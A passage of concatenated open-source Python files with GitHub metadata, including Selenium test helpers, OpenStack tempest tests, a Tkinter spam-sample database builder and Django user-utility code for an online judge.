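# argument overrides the default port, e.g.
#   python tools/httpd.py 8080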
|
{
"content_hash": "f34af722eb70af3fab0fde12fbe6b16a",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 75,
"avg_line_length": 28.43548387096774,
"alnum_prop": 0.735677821894498,
"repo_name": "endlessm/chromium-browser",
"id": "db6cefe138f68ab08095af93c337c67acde1440c",
"size": "1950",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "native_client/tools/httpd.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
import argparse
import timeit
import wandb
def main(size: int) -> None:
run = wandb.init(settings={"console": "off"})
run.log({f"v_{i}": i for i in range(size)})
run.finish()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--size",
type=int,
default=2 * 10**5,
help="size of the logged data",
)
args = parser.parse_args()
start = timeit.default_timer()
main(args.size)
stop = timeit.default_timer()
print("Time: ", stop - start)
|
{
"content_hash": "ddb1cef69de073bc8fd4633ff978a770",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 49,
"avg_line_length": 20.296296296296298,
"alnum_prop": 0.5711678832116789,
"repo_name": "wandb/client",
"id": "6bf5536172464962095cbe0fe72e9cad0887d531",
"size": "548",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/standalone_tests/log_large_data.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "4902"
},
{
"name": "Dockerfile",
"bytes": "3491"
},
{
"name": "Jupyter Notebook",
"bytes": "7751"
},
{
"name": "Makefile",
"bytes": "1863"
},
{
"name": "Objective-C",
"bytes": "80764"
},
{
"name": "Python",
"bytes": "3634228"
},
{
"name": "Shell",
"bytes": "4662"
}
],
"symlink_target": ""
}
|
"""
This module is meant for vendorizing Python libraries. Most libraries will need
to have some ``sys.path`` alterations done unless they are doing relative
imports.
Do **not** add anything to this module that does not represent a vendorized
library.
Vendored libraries should go into the ``vendor`` directory and imported from
there. This is so we allow libraries that are installed normally to be imported
if the vendored module is not available.
The import dance here is done so that all other imports throughout ceph-deploy
are kept the same regardless of where the module comes from.
The expected way to import remoto would look like this::
from ceph_deploy.lib import remoto
"""
try:
# vendored
from .vendor import remoto
except ImportError:
# normally installed
import remoto # noqa
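# The same guarded-import pattern, sketched for a hypothetical second
# vendored dependency (the name "execnet" here is illustrative only):
#
#     try:
#         from .vendor import execnet
#     except ImportError:
#         import execnet  # noqa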
|
{
"content_hash": "d741b5f436675847b3db995d66587068",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 79,
"avg_line_length": 30.25925925925926,
"alnum_prop": 0.7674418604651163,
"repo_name": "ceph/ceph-deploy",
"id": "fefb992e748e75e9bf523f12001f07793fff25bd",
"size": "817",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "ceph_deploy/lib/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "395800"
},
{
"name": "Shell",
"bytes": "9231"
}
],
"symlink_target": ""
}
|
class SessionHelper:
def __init__(self, app):
self.app = app
def login(self, username, password):
wd = self.app.wd
self.app.open_home_page()
wd.find_element_by_id("LoginForm").click()
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").clear()
wd.find_element_by_name("user").send_keys(username)
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").clear()
wd.find_element_by_name("pass").send_keys(password)
wd.find_element_by_xpath("//form[@id='LoginForm']/input[3]").click()
def logout(self):
wd = self.app.wd
wd.find_element_by_link_text("Logout").click()
def ensure_logout(self):
if self.is_logged_in():
self.logout()
def is_logged_in(self):
wd = self.app.wd
return len(wd.find_elements_by_link_text("Logout")) > 0
def is_logged_in_as(self, username):
return self.get_logged_username() == username
def get_logged_username(self):
wd = self.app.wd
return wd.find_element_by_xpath("//div/div[1]/form/b").text[1:-1]
def ensure_login(self, username, password):
if self.is_logged_in():
if self.is_logged_in_as(username):
return
else:
self.logout()
self.login(username, password)
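# Usage sketch (assumes an `app` fixture exposing `wd`, a Selenium WebDriver,
# and `open_home_page()`, as elsewhere in this test framework):
#
#     helper = SessionHelper(app)
#     helper.ensure_login("admin", "secret")   # logs in only when necessary
#     assert helper.is_logged_in_as("admin")
#     helper.ensure_logout()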
|
{
"content_hash": "02d0a4e4f6727e8f391212b6c24f3990",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 76,
"avg_line_length": 32.372093023255815,
"alnum_prop": 0.5747126436781609,
"repo_name": "OlgaKuratkina/python_training_qa",
"id": "b3bc0c015a081998e9b1535f39be0a91622655b5",
"size": "1394",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fixture/session.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "37828"
}
],
"symlink_target": ""
}
|
from .elementfinder import ElementFinder
from .tableelementfinder import TableElementFinder
from .windowmanager import WindowManager
__all__ = [
"ElementFinder",
"TableElementFinder",
"WindowManager"
]
|
{
"content_hash": "132af17a5740979fc995db974f11f91e",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 50,
"avg_line_length": 24.11111111111111,
"alnum_prop": 0.7603686635944701,
"repo_name": "vincentfretin/robotframework-selenium2library",
"id": "7c3f180b8d9a945f1643a0c59930b56fe6e66110",
"size": "217",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/Selenium2Library/locators/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1739"
},
{
"name": "JavaScript",
"bytes": "9719"
},
{
"name": "Python",
"bytes": "247158"
}
],
"symlink_target": ""
}
|
class DynamicObject(object):
    def __init__(self, dictionary=None):
        # Avoid the shared-mutable-default pitfall: each instance gets its own dict.
        if dictionary is None:
            dictionary = {}
        self.__dict__['_dict'] = dictionary
def __setattr__(self, name, value):
d = self.__dict__['_dict']
d[name] = value
def __getattr__(self, name):
d = self.__dict__['_dict']
if name in d:
return d[name]
else:
raise AttributeError(name)
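# Usage sketch: attribute access is proxied to the wrapped dictionary.
#
#     obj = DynamicObject({"x": 1})
#     obj.y = 2
#     assert obj.x == 1 and obj.y == 2
#     obj.missing  # raises AttributeError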
|
{
"content_hash": "ef7b906819d64fb687328d2c1d133a2b",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 43,
"avg_line_length": 22.3,
"alnum_prop": 0.4282511210762332,
"repo_name": "ThomasBollmeier/bovinus",
"id": "29cb2e93215f672065bf76cbb1d3a58eddb9fb40",
"size": "1059",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/runtime/python/util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "75463"
},
{
"name": "M4",
"bytes": "1643"
},
{
"name": "Makefile",
"bytes": "2791"
},
{
"name": "PHP",
"bytes": "83682"
},
{
"name": "Python",
"bytes": "197313"
},
{
"name": "Shell",
"bytes": "1441"
},
{
"name": "Vim script",
"bytes": "1125"
}
],
"symlink_target": ""
}
|
from tempest.api.compute import base
from tempest import exceptions
from tempest.test import attr
class ServerAddressesV3Test(base.BaseV3ComputeTest):
_interface = 'json'
@classmethod
def setUpClass(cls):
super(ServerAddressesV3Test, cls).setUpClass()
cls.client = cls.servers_client
resp, cls.server = cls.create_test_server(wait_until='ACTIVE')
@attr(type=['negative', 'gate'])
def test_list_server_addresses_invalid_server_id(self):
# List addresses request should fail if server id not in system
self.assertRaises(exceptions.NotFound, self.client.list_addresses,
'999')
@attr(type=['negative', 'gate'])
def test_list_server_addresses_by_network_neg(self):
# List addresses by network should fail if network name not valid
self.assertRaises(exceptions.NotFound,
self.client.list_addresses_by_network,
self.server['id'], 'invalid')
@attr(type='smoke')
def test_list_server_addresses(self):
# All public and private addresses for
# a server should be returned
resp, addresses = self.client.list_addresses(self.server['id'])
self.assertEqual('200', resp['status'])
# We do not know the exact network configuration, but an instance
# should at least have a single public or private address
self.assertTrue(len(addresses) >= 1)
for network_name, network_addresses in addresses.iteritems():
self.assertTrue(len(network_addresses) >= 1)
for address in network_addresses:
self.assertTrue(address['addr'])
self.assertTrue(address['version'])
@attr(type='smoke')
def test_list_server_addresses_by_network(self):
# Providing a network type should filter
# the addresses return by that type
resp, addresses = self.client.list_addresses(self.server['id'])
# Once again we don't know the environment's exact network config,
# but the response for each individual network should be the same
# as the partial result of the full address list
id = self.server['id']
for addr_type in addresses:
resp, addr = self.client.list_addresses_by_network(id, addr_type)
self.assertEqual('200', resp['status'])
addr = addr[addr_type]
for address in addresses[addr_type]:
self.assertTrue(any([a for a in addr if a == address]))
class ServerAddressesV3TestXML(ServerAddressesV3Test):
_interface = 'xml'
|
{
"content_hash": "9068495a8fe4f3e413d1ea43bd7271b1",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 77,
"avg_line_length": 39.1044776119403,
"alnum_prop": 0.6423664122137405,
"repo_name": "adkerr/tempest",
"id": "82588b686bb713e743c65252ba713aa31a7def40",
"size": "3301",
"binary": false,
"copies": "3",
"ref": "refs/heads/netapp/akerr",
"path": "tempest/api/compute/v3/servers/test_server_addresses.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1855736"
},
{
"name": "Shell",
"bytes": "5748"
}
],
"symlink_target": ""
}
|
import simuvex
class UserHook(simuvex.SimProcedure):
NO_RET = True
# pylint: disable=arguments-differ
def run(self, user_func=None, user_kwargs=None, default_return_addr=None, length=None):
result = user_func(self.state, **user_kwargs)
if result is None:
self.add_successor(self.state, default_return_addr, self.state.se.true, 'Ijk_NoHook')
else:
for state in result:
self.add_successor(state, state.ip, state.scratch.guard, state.scratch.jumpkind)
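# Usage sketch (hedged: the exact hooking API depends on the simuvex/angr
# version in use). A user function receives the state and either returns None,
# to continue at default_return_addr, or a list of successor states:
#
#     def patch_eax(state):
#         state.regs.eax = 0
#         return None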
|
{
"content_hash": "5d8d451566f64014e95e48c72c548191",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 97,
"avg_line_length": 40.53846153846154,
"alnum_prop": 0.6584440227703985,
"repo_name": "chubbymaggie/simuvex",
"id": "c1ec1de15f685e145d39864ede5c81c1aefa638f",
"size": "527",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "simuvex/procedures/stubs/UserHook.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "6276"
},
{
"name": "C++",
"bytes": "34210"
},
{
"name": "Makefile",
"bytes": "599"
},
{
"name": "Python",
"bytes": "854125"
}
],
"symlink_target": ""
}
|
"""
Created on Tue Feb 09 16:03:00 2016
@author: JCole119213
"""
#import pdb
import Tkinter as tki
import tkFileDialog
from EmailSamplesDB import EmailSamplesDB
import argparse
import logging
import os
from ProgressWindow import *
class DBBuildGUI(tki.Toplevel) :
def __init__(self, parent, DBobj, *args, **kwargs) :
try :
initdir = kwargs['initialdir']
del kwargs['initialdir']
		except KeyError :
initdir = os.path.abspath(r'.')
self.DBobj = DBobj
self.parent = parent
tki.Toplevel.__init__(self, parent)
self.transient(parent)
self.title("Build the sample database")
self.result = None
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.cancel)
self.geometry("+%d+%d"%(parent.winfo_rootx()+50,
parent.winfo_rooty()+50))
self.SampleSetDistributionFrame = self.DefineSampleSetDistributionFrame()
self.SampleSetDistributionFrame.grid(row=0,column=0,columnspan=2,pady=10,ipady=3,ipadx=3)
tki.Label(self,text="Enter a directory with legitimate email samples:").grid(row=1,column=0,columnspan=2,sticky=tki.W,padx=5)
self.GoodSamples = tki.Entry(self,width=100)
self.GoodSamples.grid(row=2,column=0,sticky=tki.W,padx=5)
tki.Label(self,text="Enter a directory with spam samples:").grid(row=3,column=0,columnspan=2,sticky=tki.W,padx=5)
self.SpamSamples = tki.Entry(self,width=100)
self.SpamSamples.grid(row=4,column=0,sticky=tki.W,padx=5)
# defining options for opening a directory
self.legitdir_opt = options1 = {}
options1['initialdir'] = initdir
options1['mustexist'] = True
options1['title'] = 'Select a directory with legitimate email examples'
self.BrowseLegit = tki.Button(self,text="Browse",command=self.asklegitdirectory)
self.BrowseLegit.focus_set()
self.BrowseLegit.grid(row=2,column=1,padx=5,pady=5)
self.spamdir_opt = options2 = {}
options2['initialdir'] = initdir
options2['mustexist'] = True
options2['title'] = 'Select a directory with spam examples'
self.BrowseSpam = tki.Button(self,text="Browse",command=self.askspamdirectory)
self.BrowseSpam.grid(row=4,column=1,padx=5,pady=5)
self.ButtonsFrame = self.DefineButtonsFrame()
self.ButtonsFrame.grid(row=5,column=0,columnspan=2,sticky=tki.W+tki.E,pady=20)
self.dbfile_opt = {}
self.dbfile_opt['initialdir'] = initdir
self.dbfile_opt['filetypes'] = [('database files','.sqlite3'),('all files','.*')]
self.bind("<Escape>",self.cancel)
self.wait_window(self)
return
def cancel(self,_=None) :
logging.debug("Shutting down the dialog")
self.result = self.DBobj.DBpath
self.parent.focus_set()
self.destroy()
def DefineSampleSetDistributionFrame(self) :
SampleDistFrame = tki.Frame(self,relief=tki.SUNKEN,borderwidth=3)
tki.Label(SampleDistFrame,text="Set Distribution Targets",font='TkHeadingFont 12').grid(row=0,columnspan=6,padx=30)
tki.Label(SampleDistFrame,text="Training",width=8).grid(row=1,column=0,columnspan=2)
tki.Label(SampleDistFrame,text="Cross Validation",width=16).grid(row=1,column=2,columnspan=2)
tki.Label(SampleDistFrame,text="Test").grid(row=1,column=4,columnspan=2)
self.TrainingPercentEntry = tki.Entry(SampleDistFrame,justify='center',width=5)
self.TrainingPercentEntry.insert(0,"60")
self.TrainingPercentEntry.grid(row=2,column=0,sticky=tki.E)
tki.Label(SampleDistFrame,text='%',width=1).grid(row=2,column=1,sticky=tki.W)
self.CrossValPercentEntry = tki.Entry(SampleDistFrame,justify='center',width=5)
self.CrossValPercentEntry.insert(0,"20")
self.CrossValPercentEntry.grid(row=2,column=2,sticky=tki.E)
tki.Label(SampleDistFrame,text='%',width=1).grid(row=2,column=3,sticky=tki.W)
self.TestPercentEntry = tki.Entry(SampleDistFrame,justify='center',width=5)
self.TestPercentEntry.insert(0,"20")
self.TestPercentEntry.grid(row=2,column=4,sticky=tki.E)
tki.Label(SampleDistFrame,text='%',width=1).grid(row=2,column=5,sticky=tki.W)
tki.Label(SampleDistFrame,text="Current DB Distribution",font='TkHeadingFont 12').grid(row=0,column=6,columnspan=3,padx=30)
tki.Label(SampleDistFrame,text="Training").grid(row=1,column=6)
tki.Label(SampleDistFrame,text="Cross Validation").grid(row=1,column=7)
tki.Label(SampleDistFrame,text="Test").grid(row=1,column=8)
self.DBTrainingPercent = tki.StringVar(SampleDistFrame)
tki.Label(SampleDistFrame,textvariable=self.DBTrainingPercent).grid(row=2,column=6)
self.DBCrossValPercent = tki.StringVar(SampleDistFrame)
tki.Label(SampleDistFrame,textvariable=self.DBCrossValPercent).grid(row=2,column=7)
self.DBTestPercent = tki.StringVar(SampleDistFrame)
tki.Label(SampleDistFrame,textvariable=self.DBTestPercent).grid(row=2,column=8)
self.UpdateDBDist()
return SampleDistFrame
def UpdateDBDist(self) :
logging.debug("Updating the DB distribution indicator")
if self.DBobj.DBpath is not None :
try :
self.DBobj.ConnectDB(self.DBobj.DBpath)
_,DBDist = self.DBobj.GetSampleDistribution()
SampleCount = self.DBobj.GetSampleCount()
self.DBobj.DisconnectDB()
				# float() avoids Python 2 integer division truncating each entry to 0
				DBDist = [float(SetCount)/SampleCount*100 for SetCount in DBDist]
except ZeroDivisionError :
DBDist = [0,0,0]
except Exception as detail :
logging.debug("Using default set distribution [0,0,0] due to error: %s"%detail)
DBDist = [0,0,0]
else :
DBDist = [0,0,0]
self.DBTrainingPercent.set("%.1f%%"%DBDist[0])
self.DBCrossValPercent.set("%.1f%%"%DBDist[1])
self.DBTestPercent.set("%.1f%%"%DBDist[2])
return
def GetTargetDBDist(self) :
TargDBDist = [self.TrainingPercentEntry.get(),
self.CrossValPercentEntry.get(),
self.TestPercentEntry.get()]
for ii,val in enumerate(TargDBDist) :
try :
TargDBDist[ii] = float(val)/100
assert TargDBDist[ii]>=0 and TargDBDist[ii]<=1,"Sample distribution targets must be in the range [0,1]"
except ValueError as detail :
logging.error("Could not convert one of the sample distribution targets to a float: %s"%detail)
TargDBDist[ii] = None
except AssertionError as detail :
logging.error(detail)
TargDBDist[ii] = None
		# A failed conversion above leaves None entries; bail out before summing.
		if None in TargDBDist :
			return (None,None,None)
		# Compare the float sum with a small tolerance rather than exact equality.
		if abs(sum(TargDBDist) - 1) < 1e-9 :
			return tuple(TargDBDist)
		else :
			logging.error("Total of the sample distribution targets must be 1")
			return (None,None,None)
def DefineButtonsFrame(self) :
ButFrame = tki.Frame(self)
self.CreateDBBut = tki.Button(ButFrame,text="Create DB",command=self.NewDB)
self.CreateDBBut.grid(row=0,column=0,padx=5,sticky=tki.W+tki.E)
self.AttachDBBut = tki.Button(ButFrame,text="Attach DB",command=self.OpenDB)
self.AttachDBBut.grid(row=0,column=1,padx=5,sticky=tki.W+tki.E)
self.CloseDBBut = tki.Button(ButFrame,text="Close DB",command=self.CloseDB)
self.CloseDBBut.grid(row=0,column=2,padx=5,sticky=tki.W+tki.E)
self.AddToDBBut = tki.Button(ButFrame,text="Add to DB",command=self.AddDB)
self.AddToDBBut.grid(row=0,column=3,padx=5,sticky=tki.W+tki.E)
self.ResetDBBut = tki.Button(ButFrame,text="Reset DB",command=self.ResetDB)
self.ResetDBBut.grid(row=0,column=4,padx=5,sticky=tki.W+tki.E)
ButFrame.grid_columnconfigure(0,weight=1)
ButFrame.grid_columnconfigure(1,weight=1)
ButFrame.grid_columnconfigure(2,weight=1)
ButFrame.grid_columnconfigure(3,weight=1)
ButFrame.grid_columnconfigure(4,weight=1)
self.connect_text = tki.StringVar(ButFrame)
self.connect_text.set("Currently connected database: %s"%self.DBobj.DBpath)
self.ConnectionLabel = tki.Label(ButFrame,textvariable=self.connect_text,justify="left")
self.ConnectionLabel.grid(row=1,column=0,columnspan=5,sticky=tki.W)
return ButFrame
# Function callbacks for GUI buttons
def asklegitdirectory(self) :
dirstr = tkFileDialog.askdirectory(**self.legitdir_opt)
if dirstr :
self.GoodSamples.delete(0,tki.END)
self.GoodSamples.insert(0,dirstr)
self.legitdir_opt['initialdir'] = dirstr
if self.spamdir_opt['initialdir'] == os.path.abspath(r'.') :
self.spamdir_opt['initialdir'] = dirstr
return
def askspamdirectory(self) :
dirstr = tkFileDialog.askdirectory(**self.spamdir_opt)
if dirstr :
self.SpamSamples.delete(0,tki.END)
self.SpamSamples.insert(0,dirstr)
self.spamdir_opt['initialdir'] = dirstr
if self.legitdir_opt['initialdir'] == os.path.abspath(r'.') :
self.legitdir_opt['initialdir'] = dirstr
return
def NewDB(self) :
"""
Ask for a filename to create a new database file, then create a new database and initialize
the required tables.
"""
self.dbfile_opt['title'] = 'Create a new email database file'
filename = tkFileDialog.asksaveasfilename(**self.dbfile_opt)
logging.debug('Connecting to database at %s'%filename)
self.DBobj.ConnectDB(filename)
logging.debug('Result: %s'%self.DBobj.DB_Connect)
try :
logging.debug('Creating fresh database at %s'%filename)
self.DBobj.CreateDB()
finally :
logging.debug('Disconnecting database at %s'%self.DBobj.DB_Connect)
self.DBobj.DisconnectDB()
logging.debug('Result: %s'%self.DBobj.DB_Connect)
self.connect_text.set("Currently connected database: %s"%self.DBobj.DBpath)
self.UpdateDBDist()
return
def OpenDB(self) :
"""
Open a feature vector database file, extract the available word lists that feature vectors can be
created against, and populate the word list drop down menu
"""
self.dbfile_opt['title'] = 'Select an existing email database file'
filename = tkFileDialog.askopenfilename(**self.dbfile_opt)
self.DBobj.DBpath = filename
self.connect_text.set("Currently connected database: %s"%self.DBobj.DBpath)
self.UpdateDBDist()
return
def CloseDB(self) :
"""
Forgets the path the database currently in use. Should not need to actually close the connection
because the connection should not be held open by any thread (that would block the database from
other threads).
"""
assert self.DBobj.DB_Connect is None, "Expected database connection to already be closed, but it wasn't"
self.DBobj.DBpath = None
self.connect_text.set("Currently connected database: %s"%self.DBobj.DBpath)
self.UpdateDBDist()
return
def AddDB(self) :
"""
"""
def cmd(*args) :
self.DBobj.ConnectDB()
self.DBobj.AddToDB(*args)
self.DBobj.DisconnectDB()
TargDBDist = self.GetTargetDBDist()
emailspath = self.GoodSamples.get()
if emailspath :
classname = str(self.DBobj.SQLCMDs['ClassesList'][0])
args = [emailspath,classname,TargDBDist]
ProgressWindow(self,cmd,*args,title="Progress adding emails")
spampath = self.SpamSamples.get()
if spampath :
classname = str(self.DBobj.SQLCMDs['ClassesList'][1])
args = [spampath,classname,TargDBDist]
ProgressWindow(self,cmd,*args,title="Progress adding spam")
self.UpdateDBDist()
return
def ResetDB(self) :
self.DBobj.ConnectDB()
try :
self.DBobj.ResetDB()
self.DBobj.CreateDB()
except Exception as detail :
logging.error(detail)
finally :
self.DBobj.DisconnectDB()
self.UpdateDBDist()
###################################### Main Program ######################################
if __name__ == "__main__" :
logging.basicConfig(level=logging.DEBUG)
#pdb.set_trace()
parser = argparse.ArgumentParser(description='Email samples database building GUI')
parser.add_argument('--pragmapath','-p',
help='path to a json file with the PRAGMA commands for the database',
default=os.path.abspath(r'.\DBSetup_SQL.json'))
parser.add_argument('--sqlpath','-s',
help='path to a json file with the SQL commands for the database',
default=os.path.abspath(r'.\EmailSamplesDB_SQL.json'))
parser.add_argument('--tempsqlpath','-t',
help='path to a json file with the SQL commands for temp databases',
default=os.path.abspath(r'.\TempDB_SQL.json'))
parser.add_argument('--initialdir','-d',
help='path to an initial directory to start looking for files',
default=os.path.abspath(r'.'))
parser.add_argument('--version', action='version', version='%(prog)s 1.0')
paramsobj = parser.parse_args()
params = vars(paramsobj)
testDB = EmailSamplesDB(params['sqlpath'],params['pragmapath'],params['tempsqlpath'])
root = tki.Tk()
root.wm_title("Test the database building dialog")
icon_image = tki.Image("photo",file=os.path.abspath(r".\MainGUI.gif"))
root.tk.call('wm','iconphoto',root._w,icon_image)
initdir = os.path.abspath(r'.')
DBBuildGUI(root,testDB,initialdir=initdir)
|
{
"content_hash": "07766c01a2180af1796d67d107373a45",
"timestamp": "",
"source": "github",
"line_count": 315,
"max_line_length": 127,
"avg_line_length": 39.94603174603174,
"alnum_prop": 0.7043630294842248,
"repo_name": "joecole889/spam-filter",
"id": "8e747da93ee6b0c373457b82d1cf24a3c7a6a709",
"size": "12608",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "DBBuildGUI.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "6721"
},
{
"name": "Makefile",
"bytes": "6802"
},
{
"name": "Python",
"bytes": "101113"
}
],
"symlink_target": ""
}
|
"""
The MIT License (MIT)
Copyright (c) 2014 NTHUOJ team
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from datetime import datetime
from threading import Thread
import hashlib
import random
from django.core.urlresolvers import reverse
from django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string
from django.http import HttpResponseRedirect
from contest.models import Contest
from contest.models import Contestant
from problem.models import Submission, SubmissionDetail
from users.models import User, UserProfile, Notification
from utils.log_info import get_logger
from utils.config_info import get_config
from django.conf import settings
EMAIL_HOST_USER = get_config('email', 'user')
logger = get_logger()
def has_contest_ownership(curr_user, curr_contest):
curr_user = validate_user(curr_user)
if curr_user == curr_contest.owner:
return True
contest_coowners = curr_contest.coowner.all()
return curr_user in contest_coowners
def has_group_ownership(curr_user, curr_group):
curr_user = validate_user(curr_user)
if curr_user == curr_group.owner or curr_user.has_admin_auth():
return True
return False
def has_group_coownership(curr_user, curr_group):
curr_user = validate_user(curr_user)
group_coowners = curr_group.coowner.all()
if group_coowners:
for coowner in group_coowners:
if curr_user == coowner:
return True
return False
def has_problem_ownership(curr_user, curr_problem):
curr_user = validate_user(curr_user)
return curr_user == curr_problem.owner
def has_problem_auth(user, problem):
"""Check if user has authority to see/submit that problem"""
user = validate_user(user)
if problem.visible:
return True
last_contest = problem.contest_set.all().order_by('-start_time')
if last_contest and last_contest[0].start_time < datetime.now():
problem.visible = True
problem.save()
return True
# check the invisible problem
# To see/submit an invisible problem, user must
# 1. has admin auth
if user.has_admin_auth():
return True
# 2. be the problem owner
if has_problem_ownership(user, problem):
return True
# 3. be a contest owner/coowner
contests = Contest.objects.filter(
creation_time__lte=datetime.now(),
end_time__gte=datetime.now(),
problem=problem)
for contest in contests:
if has_contest_ownership(user, contest):
return True
# None of the condition is satisfied
return False
def validate_user(user):
# an anonymous user is treated as a normal user
if user.is_anonymous():
        user = User()  # create a temporary user instance with no attributes
return user
def get_user_statistics(user):
"""Find the statistics of the given user"""
# fetch some status labels in Submissions
# here, we only concern about COMPILE_ERROR, RESTRICTED_FUNCTION,
# and JUDGE_ERROR since ACCEPTED, NOT_ACCEPTED, etc will appear in
# SubmissionDetail.VERDICT_CHOICE
status_labels = [
Submission.COMPILE_ERROR,
Submission.RESTRICTED_FUNCTION,
Submission.JUDGE_ERROR
]
# find all verdict in SubmissionDetail.VERDICT_CHOICE
verdict_labels = [x[0] for x in SubmissionDetail.VERDICT_CHOICE]
statistics = []
# fetch Submission of the given user
submissions = Submission.objects.filter(user=user)
for label in status_labels:
statistics += [{
'label': label,
'value': submissions.filter(status=label).count()
}]
# fetch Submission of the given user
submissions_id = map(lambda submission: submission.id, submissions)
submission_details = SubmissionDetail.objects.filter(
sid__in=submissions_id)
for label in verdict_labels:
statistics += [{
'label': label,
'value': submission_details.filter(verdict=label).count()
}]
return statistics
def send_activation_email(request, user):
username = user.username
email = user.email
salt = hashlib.sha1(str(random.random())).hexdigest()[:5]
activation_key = hashlib.sha1(salt + email).hexdigest()
# Create and save user profile
new_profile = UserProfile(user=user, activation_key=activation_key)
new_profile.save()
# Send email with activation key
activation_link = request.META['HTTP_HOST'] + \
reverse('users:confirm', kwargs={'activation_key': activation_key})
email_subject = 'Account confirmation'
email_body = render_to_string('index/activation_email.html',
{'username': username, 'activation_link': activation_link,
'active_time': new_profile.active_time})
msg = EmailMultiAlternatives(
email_subject, email_body, EMAIL_HOST_USER, [email])
msg.attach_alternative(email_body, "text/html")
try:
Thread(target=msg.send, args=()).start()
except:
logger.warning(
"There is an error when sending email to %s's mailbox" % username)
def send_forget_password_email(request, user):
username = user.username
email = user.email
salt = hashlib.sha1(str(random.random())).hexdigest()[:5]
activation_key = hashlib.sha1(salt + email).hexdigest()
# Create and save user profile
UserProfile.objects.filter(user=user).delete()
new_profile = UserProfile(user=user, activation_key=activation_key)
new_profile.save()
# Send email with activation key
profile_link = request.META['HTTP_HOST'] + \
reverse('users:forget_password_confirm',
kwargs={'activation_key': activation_key})
email_subject = 'Password Reset'
email_body = render_to_string('index/forget_password_email.html',
{'username': username, 'profile_link': profile_link,
'active_time': new_profile.active_time})
msg = EmailMultiAlternatives(
email_subject, email_body, EMAIL_HOST_USER, [email])
msg.attach_alternative(email_body, "text/html")
try:
Thread(target=msg.send, args=()).start()
except:
logger.warning(
"There is an error when sending email to %s's mailbox" % username)
def send_notification(user, content):
try:
Notification.objects.create(receiver=user, message=content)
logger.info("send notification to %s successfully" % user.username)
except:
logger.warning(
"There is an error when sending notification to %s" % user.username)
|
{
"content_hash": "fd550404c33767392d205fc1df988a62",
"timestamp": "",
"source": "github",
"line_count": 222,
"max_line_length": 92,
"avg_line_length": 34.43693693693694,
"alnum_prop": 0.6837148463047744,
"repo_name": "bruce3557/NTHUOJ_web",
"id": "88a73bdf67c799ebb80cd22070cb01881b506e67",
"size": "7645",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "utils/user_info.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "17559"
},
{
"name": "HTML",
"bytes": "121385"
},
{
"name": "JavaScript",
"bytes": "53271"
},
{
"name": "Python",
"bytes": "241520"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('netobjects', '0006_auto_20170426_1639'),
]
operations = [
migrations.AlterField(
model_name='corenetworkobject',
name='cli_address',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='corenetworkobject',
name='dns_address',
field=models.CharField(blank=True, max_length=255),
),
migrations.AlterField(
model_name='corenetworkobject',
name='ipv4_external_address',
field=models.CharField(blank=True, max_length=255),
),
]
|
{
"content_hash": "db1bb02cdb2704db78cbc99792584364",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 63,
"avg_line_length": 28,
"alnum_prop": 0.5892857142857143,
"repo_name": "Landver/netmon",
"id": "5327a0b2e7725b1d7fe014bedb6c4d5aef473275",
"size": "855",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/netobjects/migrations/0007_auto_20170426_1726.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
